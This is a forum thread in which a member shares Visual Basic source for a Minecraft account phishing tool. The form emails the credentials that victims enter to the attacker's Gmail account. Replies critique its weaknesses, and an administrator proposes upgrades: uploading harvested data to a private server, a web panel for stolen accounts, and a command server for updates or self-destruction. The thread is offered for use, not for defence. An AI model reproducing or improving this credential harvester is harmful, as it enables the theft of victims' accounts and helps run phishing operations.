Sign in or Sign up

[VB] Phishing Code
Started by Tonyzoo1234


Rate this topic
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


4 posts in this topic
Tonyzoo1234 Offline
Junior Member
**


Registered
Posts: 27
Threads: 2
Joined: Wed Apr 2017
Reputation: 0

CZPoints: 0 CZP
Brick  11-12-2017, 03:21 PM -
#1
theHHL's Phishing Code (VB)
Enjoy this code, use it wisely.
Code:
Imports System.Net.Mail
Public Class Form1

   Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
       Dim MyMailMessage As New MailMessage()
       Try
           MyMailMessage.From = New MailAddress("YOUR EMAIL")
           MyMailMessage.To.Add("YOUR EMAIL")
           MyMailMessage.Subject = TextBox1.Text
           MyMailMessage.Body = TextBox2.Text
           Dim SMTP As New SmtpClient("smtp.gmail.com")
           SMTP.Port = 587
           SMTP.EnableSsl = True
           SMTP.Credentials = New System.Net.NetworkCredential("YOUR EMAIL", "YOUR EMAIL PASSWORD")
           SMTP.Send(MyMailMessage)
           TextBox2.Text = ""
       Catch ex As Exception
       End Try
   End Sub

   Private Sub Facebook_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

   End Sub
End Class

When it says "YOUR EMAIL" put your real email in.
When it says "YOUR EMAIL PASSWORD" put the password to the real email in.
================================================
This code is for our Minecraft Account Phishing Tool! This is our example. 
[Image: h9mlba][Image: h9mlba]Image[url=http://prntscr.com/h9mlba][/url]
Thank you for viewing, Have a nice day!
This post was last modified: 11-12-2017, 11:31 PM by Corruption.
[NS]DarkDude Offline
~# Nulled Systems #~
***


NulledSystems
Posts: 32
Threads: 5
Joined: Sun Oct 2017
Reputation: 3

CZPoints: 24 CZP
11-12-2017, 05:37 PM -
#2
From the looks of the code, it uses built in SMTP functions to allow end-user to falsify received-from: field
Money Offline
Junior Member
**


Registered
Posts: 5
Threads: 2
Joined: Thu Nov 2017
Reputation: 0

CZPoints: 13 CZP
11-30-2017, 06:56 PM -
#3
This code is dangerous on your end, if someone were to decompile the code they would easily be able to retrieve your email and pass, log in and siphon all phished accounts
Corruption Offline
Administrator
*******


Administrators
Posts: 291
Threads: 67
Joined: Fri Mar 2017

CZPoints: 119 CZP
11-30-2017, 07:17 PM -
#4
(11-30-2017, 06:56 PM)Money Wrote: This code is dangerous on your end, if someone were to decompile the code they would easily be able to retrieve your email and pass, log in and siphon all phished accounts

Only way ik this could work if you use a provider with 2FA verification.

But even if this is the case it is still shitty method. Setting up a server and making the logger save data on txt then upload to privet server using API would make shit much simpler.

Also much better if you could setup GUI acp web based to control all harvested data. Also could make the logger check for commends on the server every hour or so for maybe updates or self nuk option idk.

Back in the day I build something similar using Pastebin as the commend server and receiver.


[NS]Splinter Offline
~# Nulled Systems #~
***


NulledSystems
Posts: 25
Threads: 5
Joined: Sat Sep 2017
Reputation: 3

CZPoints: 22 CZP
11-30-2017, 10:45 PM -
#5
I see a few issues with this code, for starters as Money mentioned getting the user name and password is pretty easy it's .net. the second issue i see with this is there is no validation the login worked. a bit of python here and there and you have a massive email account with all kinds of bad credentials.

Even if they had 2fa the bot would have to have the code block and the seed making it useless. and if 2FA is used on web panel you need to make sure the provider does not allow POP3. IMAP, and/or Active Sync. I don't think there are that many that do that.




Users browsing this thread: 1 Guest(s)